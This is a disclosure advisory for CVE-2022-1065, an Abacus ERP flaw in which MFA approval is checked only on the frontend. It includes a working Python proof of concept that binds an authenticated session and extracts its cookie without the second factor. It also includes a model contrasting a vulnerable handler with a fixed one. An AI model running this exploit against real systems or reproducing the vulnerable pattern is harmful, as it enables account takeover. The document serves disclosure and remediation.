Security Advisory: MFA Bypass in various versions of Abacus (CVE-2022-1065)
--------------------------------------------------------------------------------

1. Summary
-----------

Abacus is an owner-managed Swiss software company that employs around 600 people. For over three decades it has developed successful business software [1].

This advisory describes a vulnerability affecting various versions of the Abacus ERP software. The vulnerability lies within the authentication process of Abacus and allows the second factor to be bypassed. It is therefore possible to gain access to the system with the knowledge of a valid username / password combination only, weakening the overall security level [2].

2. Vulnerable versions
-----------------------

The attack has been successfully tested against the following versions:

* v2021 prior to R4 of 2022-01-15
* v2020 prior to R6 of 2022-01-15

According to vendor information, the following versions are vulnerable as well:

* v2022 prior to R1 of 2022-01-15
* v2021 prior to R4 of 2022-01-15
* v2020 prior to R6 of 2022-01-15
* v2019 after R5 of 2022-03-15 (service pack)
* v2018 after R7 of 2022-04-15 (service pack)

2.1 Versions not vulnerable
----------------------------

According to vendor information, the following versions are not vulnerable:

* v2019 prior to R5 of 2020-03-15
* v2018 prior to R7 of 2020-04-15
* v2017 and prior versions

3. Details
-----------

The application supports multi-factor authentication (MFA) to further strengthen the authentication process. After a user enters valid credentials, a request is sent to the registered Abacus Access app on the mobile device of the user. The user then has to approve the login request before a redirect to the system is performed.

However, the verification request which the user has accepted on the mobile phone is only validated on the frontend and not on the backend. As a result, this step can be bypassed by simply ignoring the validation.
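To make the frontend-only check concrete, the following model of the approval flow is an added example; it is not Abacus code and assumes nothing about the real implementation. It contrasts a session-binding handler that trusts the client to have polled the approval status (the vulnerable pattern) with one that checks the approval state on the server before binding the session.

```python
import secrets
from dataclasses import dataclass

# Constructed user store for the model; a real backend verifies
# credentials against its own identity store.
USERS = {"alice": "correct horse battery staple"}


class MfaBindingError(Exception):
    """Raised when a session binding is attempted without a confirmed approval."""


@dataclass
class ApprovalRequest:
    username: str
    auth_session_id: str
    approved: bool = False  # flipped only by the mobile-app callback


class AuthBackend:
    def __init__(self):
        self.approvals = {}   # approvalRequestId -> ApprovalRequest
        self.sessions = {}    # authenticationSessionId -> bound username

    def authenticate(self, username, password):
        """Valid credentials create a pending approval (the MFA push)."""
        if USERS.get(username) != password:
            return None
        sid, rid = secrets.token_hex(16), secrets.token_hex(16)
        self.approvals[rid] = ApprovalRequest(username, sid)
        return sid, rid

    def approve_from_mobile(self, rid):
        """Callback from the mobile app: the user confirmed the login request."""
        self.approvals[rid].approved = True

    def bind_vulnerable(self, sid, rid):
        """Vulnerable pattern: assumes the client only calls this after a
        successful status poll, so the approval state is never inspected."""
        self.sessions[sid] = self.approvals[rid].username
        return sid

    def bind_fixed(self, sid, rid):
        """Hardened pattern: the approval state is enforced here, on the server."""
        req = self.approvals.get(rid)
        if req is None or req.auth_session_id != sid or not req.approved:
            raise MfaBindingError("MFA approval not confirmed for this session")
        del self.approvals[rid]          # one binding per approval
        self.sessions[sid] = req.username
        return sid
```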

The following steps are passed during the authentication process:

1. The user accesses the page '/portal/myabacus'
2. The server creates a new session cookie and automatically redirects the user to '/oauth/oauth2/v1/auth'
3. The user enters valid credentials, which are sent to '/oauth/oauth2/v1/authenticate'
4. If the credentials are valid, the backend system triggers the MFA request to the mobile application
5. Until the user has accepted the MFA request on the mobile device, the frontend part of the application sends regular status requests to the backend system to check whether the user has already confirmed the request
6. Once the MFA request has been confirmed and the backend sends a successful response to the status request, the authenticated session is bound using a request to '/oauth/oauth2/v1/authenticate/ocra/auth-session-bindings'

However, in the vulnerable versions, step 5 is only validated on the frontend and not on the backend. As such, an attacker can simply bypass/omit the status request and directly initiate the session binding from step 6 without further verification of the MFA status on the backend. Using this approach, it is possible to initiate a fully authenticated session by providing only username / password, without the need to enter a second authentication factor.

3.1 Proof of Concept
---------------------

The following proof of concept generates the necessary requests to obtain a valid session id.

```python
import re
import json
import urllib.parse
from urllib.request import HTTPCookieProcessor, Request, build_opener

# Instance-specific values; placeholders to be replaced for the system
# under test (these assignments are not part of the original PoC)
BASE_URL = "https://abacus.example.com"   # placeholder: base URL of the instance
DOMAIN = "abacus.example.com"             # placeholder: cookie domain of the instance
USERNAME = "user"                         # placeholder: valid username
PASSWORD = "password"                     # placeholder: valid password

cookie_processor = HTTPCookieProcessor()
opener = build_opener(cookie_processor)

# Step 1,2 - Generate Session ID
opener.open(Request(BASE_URL + "/portal/myabacus"))

# Step 3 - Perform login and extract values from the response page
data = urllib.parse.urlencode(
    {'username': USERNAME, 'password': PASSWORD}).encode()
req = Request(BASE_URL + "/oauth/oauth2/v1/authenticate", data=data)
res = opener.open(req)
raw = str(res.read())
data_auth = re.search('(?<=data-access-token=")[^"]+', raw).group(0)
data_sid = re.search('(?<=data-auth-session-id=")[^"]+', raw).group(0)
data_rid = re.search('(?<=data-approval-request-id=")[^"]+', raw).group(0)

# Step 6 - Bind auth session to session id without requesting MFA status
data = json.dumps(
    {'authenticationSessionId': data_sid, 'approvalRequestId': data_rid}
).encode('utf-8')
req = Request(BASE_URL + "/oauth/oauth2/v1/authenticate/ocra/auth-session-bindings")
req.add_header('Authorization', 'Bearer ' + data_auth)
req.add_header('Content-Type', 'application/json; charset=utf-8')
req.add_header('Content-Length', str(len(data)))
opener.open(req, data=data)

# Do manual redirect in case there is no auto redirect
# This step could be omitted depending on the system configuration
data_code = re.search('(?<=code" value=")[^"]+', raw).group(0)
data_sstate = re.search('(?<=session_state" value=")[^"]+', raw).group(0)
data_state = re.search('(?<="state" value=")[^"]+', raw).group(0)
data = urllib.parse.urlencode(
    {'code': data_code, 'session_state': data_sstate, 'state': data_state}).encode()
req = Request(BASE_URL + "/portal/myabacus/oauthcb", data=data)
opener.open(req)

# Extract the resulting session cookie from the cookie jar
print("__Secure-MYABACUS_SESSION: " + cookie_processor.cookiejar
      ._cookies[DOMAIN]['/portal/myabacus']['__Secure-MYABACUS_SESSION'].value)
```

3.2 Workaround / Fix
---------------------

Install the available hot fixes and / or service packs from 2022-01-15 or newer [3].

4. Credits
-----------

* Roman Gribi, Redguard AG

5. Timeline
------------

* 2021-12-21 : Initial notification of the vendor.
* 2021-12-29 : Communication of the vulnerability to the vendor.
* 2022-01-03 : Vendor confirmed the vulnerability and announced that a fix will be released.
* 2022-01-06 : Redguard tested/validated the fix on a test system.
* 2022-01-15 : Fix released to the public by Abacus Research AG.
* 2022-03-24 : Initial contact with NCSC as CNA of Switzerland to assign a CVE.
* 2022-03-24 : CVE-2022-1065 assigned by NCSC [4].
* 2022-04-15 : Public disclosure of this advisory.

6. About Redguard
------------------

Redguard is a Swiss-based information security company. We assist our clients with technical security testing as well as organizational security audits and consulting. This enables us to have a team with extensive experience in a wide variety of security-relevant topics.

https://www.redguard.ch
contact@redguard.ch

7. Disclaimer
--------------

This document is not meant to be a complete list of security issues for any of the mentioned software and/or versions. It is possible and indeed likely that there are further security issues that are yet to be identified. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties regarding this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

References
-----------

[1] https://www.abacus.ch/unternehmen/portrait
[2] https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication
[3] https://classic.abacus.ch/downloads-page/servicepacks
[4] https://www.cve.org/CVERecord?id=CVE-2022-1065